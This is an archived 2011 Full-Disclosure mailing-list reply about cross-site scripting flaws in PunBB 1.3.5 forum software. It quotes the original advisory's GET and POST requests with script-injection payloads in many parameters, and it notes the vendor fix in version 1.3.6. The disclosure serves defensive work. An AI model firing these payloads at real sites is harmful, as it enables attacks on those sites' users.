lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20110918163100.GA9348@foo.fgeek.fi>
Date: Sun, 18 Sep 2011 19:31:00 +0300
From: Henri Salo <henri@...v.fi>
To: Piotr Duszynski <piotr@...zynski.eu>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: PunBB PHP Forum - Multiple XSS

On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:
> =======================================================================
> PunBB PHP Forum - Multiple XSS
> =======================================================================
> 
> Affected Software : PunBB PHP Forum
> Severity          : Medium
> Local/Remote      : Remote
> Author            : @drk1wi
> 
> [Summary]
> 
> Just for those whom it might concern.
> These vulnerabilities have been identified for the latest (clean 
> version 1.3.5) during one of my penetration tests.
> 
> [Vulnerability Details]
> 
> 
> GET 
> /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
> GET 
> /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
> 
> POST /delete.php?id=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>
> 
> POST /edit.php?id=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
> 
> POST /login.php?action=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>
> 
> POST /misc.php?email=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
> 
> POST 
> /profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>
> 
> POST /register.php?action=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'><script>alert(oink)</script>
> 
> 
> [Time-line]
> 
> 20/08/2011 - Vendor notified
> 02/09/2011 - No e-mail reply and BAN on Forum
> ???        - Vendor patch release
> 16/09/2011 - Public disclosure
> 
> [Fix Information]
> 
> 
> Cheers,
> Piotr Duszynski (@drk1wi)
> http://sharpsec.net
> 
> X. LEGAL NOTICES
> 
> Copyright (c) 2011 Piotr "drk1wi" Duszynski
> 
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without mine express
> written consent. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email me for permission.
> 
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS 
> condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, 
> indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.

Fixed on: https://github.com/punbb/punbb/commit/dd50a50a2760f10bd2d09814e30af4b36052ca6d
PunBB 1.3.6 released: https://github.com/downloads/punbb/punbb/punbb-1.3.6.zip

I can request CVE-identifier for this issue.

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists